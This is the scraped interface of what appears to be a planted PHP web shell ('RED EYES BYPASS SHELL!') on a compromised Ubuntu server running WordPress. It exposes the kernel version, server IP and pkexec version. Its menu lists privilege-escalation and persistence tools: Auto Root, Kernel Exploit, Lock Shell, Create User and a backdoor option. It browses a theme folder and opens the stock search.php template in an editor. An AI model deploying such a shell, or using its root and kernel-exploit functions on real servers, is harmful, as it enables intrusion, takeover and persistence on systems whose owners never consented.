Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
twentynineteen /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
classes
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
846
B
-rwxr-xr-x
archive.php
1.21
KB
-rwxr-xr-x
comments.php
3.98
KB
-rwxr-xr-x
contributing.txt
1.2
KB
-rwxr-xr-x
footer.php
1.58
KB
-rwxr-xr-x
functions.php
11.42
KB
-rwxr-xr-x
header.php
1.9
KB
-rwxr-xr-x
image.php
2.92
KB
-rwxr-xr-x
index.php
1.04
KB
-rwxr-xr-x
package-lock.json
247.15
KB
-rwxr-xr-x
package.json
1.58
KB
-rwxr-xr-x
page.php
766
B
-rwxr-xr-x
postcss.config.js
255
B
-rwxr-xr-x
print.css
4.05
KB
-rwxr-xr-x
print.scss
3.36
KB
-rwxr-xr-x
readme.txt
5.44
KB
-rwxr-xr-x
screenshot.png
171.15
KB
-rwxr-xr-x
search.php
1.33
KB
-rwxr-xr-x
single.php
1.81
KB
-rwxr-xr-x
style-editor-customizer.css
159
B
-rwxr-xr-x
style-editor-customizer.scss
158
B
-rwxr-xr-x
style-editor.css
80.52
KB
-rwxr-xr-x
style-editor.scss
19.59
KB
-rwxr-xr-x
style-rtl.css
222.74
KB
-rwxr-xr-x
style.css
222.93
KB
-rwxr-xr-x
style.css.map
15.35
KB
-rwxr-xr-x
style.scss
3.18
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search.php
<?php /** * The template for displaying search results pages * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#search-result * * @package WordPress * @subpackage Twenty_Nineteen * @since Twenty Nineteen 1.0 */ get_header(); ?> <div id="primary" class="content-area"> <main id="main" class="site-main"> <?php if ( have_posts() ) : ?> <header class="page-header"> <h1 class="page-title"> <?php _e( 'Search results for: ', 'twentynineteen' ); ?> <span class="page-description"><?php echo get_search_query(); ?></span> </h1> </header><!-- .page-header --> <?php // Start the Loop. while ( have_posts() ) : the_post(); /* * Include the Post-Format-specific template for the content. * If you want to override this in a child theme, then include a file * called content-___.php (where ___ is the Post Format name) and that * will be used instead. */ get_template_part( 'template-parts/content/content', 'excerpt' ); // End the loop. endwhile; // Previous/next page navigation. twentynineteen_the_posts_navigation(); // If no content, include the "No posts found" template. else : get_template_part( 'template-parts/content/content', 'none' ); endif; ?> </main><!-- #main --> </div><!-- #primary --> <?php get_footer();
Close